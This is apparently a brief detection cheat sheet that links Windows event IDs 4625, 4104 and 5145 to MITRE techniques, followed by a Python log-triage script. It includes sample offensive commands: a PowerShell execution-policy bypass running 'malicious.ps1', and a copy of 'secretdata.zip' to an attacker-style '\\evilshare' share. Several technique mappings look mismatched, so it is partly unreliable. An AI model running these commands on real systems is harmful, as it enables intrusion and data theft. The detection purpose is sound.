
Event Codes for Fun and Profit


Unauthorized Access Attempt:
ID: 001
MITRE Tactic & Techniques: Initial Access / Phishing [T1566.001]
Event ID & Code: 4625 FAILED_LOGON
Status Code: 0x8007052e
Commands and Code: Auditpol /set /subcategory:"Logon" /success:enable /failure:enable
Description: An attempt to log on with incorrect credentials was made.
Example Offensive Codes and Commands: net use \\target-system\IPC$ /user:username wrongpassword

Malware Execution:
ID: 002
MITRE Tactic & Techniques: Execution / Command and Scripting Interpreter [T1059]
Event ID & Code: 4104 POWERSHELL_SCRIPT_EXECUTION
Status Code: N/A
Commands and Code: Set-ExecutionPolicy Unrestricted
Description: Execution of a PowerShell script was detected.
Example Offensive Codes and Commands: powershell -ep bypass -f malicious.ps1

Data Exfiltration:
ID: 003
MITRE Tactic & Techniques: Exfiltration / Data Compressed [T1560.001]
Event ID & Code: 5145 FILE_SHARE_ACCESS
Status Code: N/A
Commands and Code: netsh trace start capture=yes
Description: Unauthorized access to a file share was detected.
Example Offensive Codes and Commands: copy /Z secretdata.zip \\evilshare\stolen-data\
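The three mappings above can be applied directly to log records. The following is an added triage example (not code from the original post); the record field names, the failed-logon threshold and the sample events are assumptions made for this illustration.

```python
from collections import Counter

# The post's mapping table: Event ID -> (event code, MITRE technique)
EVENT_TABLE = {
    4625: ("FAILED_LOGON", "T1566.001"),
    4104: ("POWERSHELL_SCRIPT_EXECUTION", "T1059"),
    5145: ("FILE_SHARE_ACCESS", "T1560.001"),
}

FAILED_LOGON_THRESHOLD = 3  # assumption: alert at 3 or more failures per account/source

# Constructed sample records (not real log data); field names are assumptions
SAMPLE_EVENTS = [
    {"EventID": 4625, "Account": "jdoe", "Source": "10.0.0.5", "Status": "0x8007052e"},
    {"EventID": 4625, "Account": "jdoe", "Source": "10.0.0.5", "Status": "0x8007052e"},
    {"EventID": 4625, "Account": "jdoe", "Source": "10.0.0.5", "Status": "0x8007052e"},
    {"EventID": 4625, "Account": "asmith", "Source": "10.0.0.9", "Status": "0x8007052e"},
    {"EventID": 4104, "Host": "WS01", "Script": "Set-ExecutionPolicy Unrestricted"},
    {"EventID": 4104, "Host": "WS02", "Script": "Get-Process | Sort-Object CPU"},
    {"EventID": 5145, "Share": r"\\fs01\backup", "Target": "secretdata.zip"},
    {"EventID": 5145, "Share": r"\\fs01\public", "Target": "readme.txt"},
    {"EventID": 4688, "Host": "WS01"},  # not in the post's table; ignored
]


def triage(events):
    """Apply the post's three mappings and return a list of alert strings."""
    alerts = []
    failures = Counter()  # (account, source) -> number of 4625 events
    for ev in events:
        mapping = EVENT_TABLE.get(ev["EventID"])
        if mapping is None:
            continue  # event ID not covered by the post's table
        code, technique = mapping
        if ev["EventID"] == 4625:
            # single failures are noise; count them and decide after the loop
            failures[(ev["Account"], ev["Source"])] += 1
        elif ev["EventID"] == 4104 and "Set-ExecutionPolicy Unrestricted" in ev["Script"]:
            alerts.append(f"{code} [{technique}]: execution policy relaxed on {ev['Host']}")
        elif ev["EventID"] == 5145 and ev["Target"].lower().endswith(".zip"):
            # archive written to a share: the post's T1560.001 scenario
            alerts.append(f"{code} [{technique}]: {ev['Target']} -> {ev['Share']}")
    for (account, source), n in failures.items():
        if n >= FAILED_LOGON_THRESHOLD:
            code, technique = EVENT_TABLE[4625]
            alerts.append(f"{code} [{technique}]: {n} failed logons for {account} from {source}")
    return alerts


if __name__ == "__main__":
    print("\n".join(triage(SAMPLE_EVENTS)))
```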
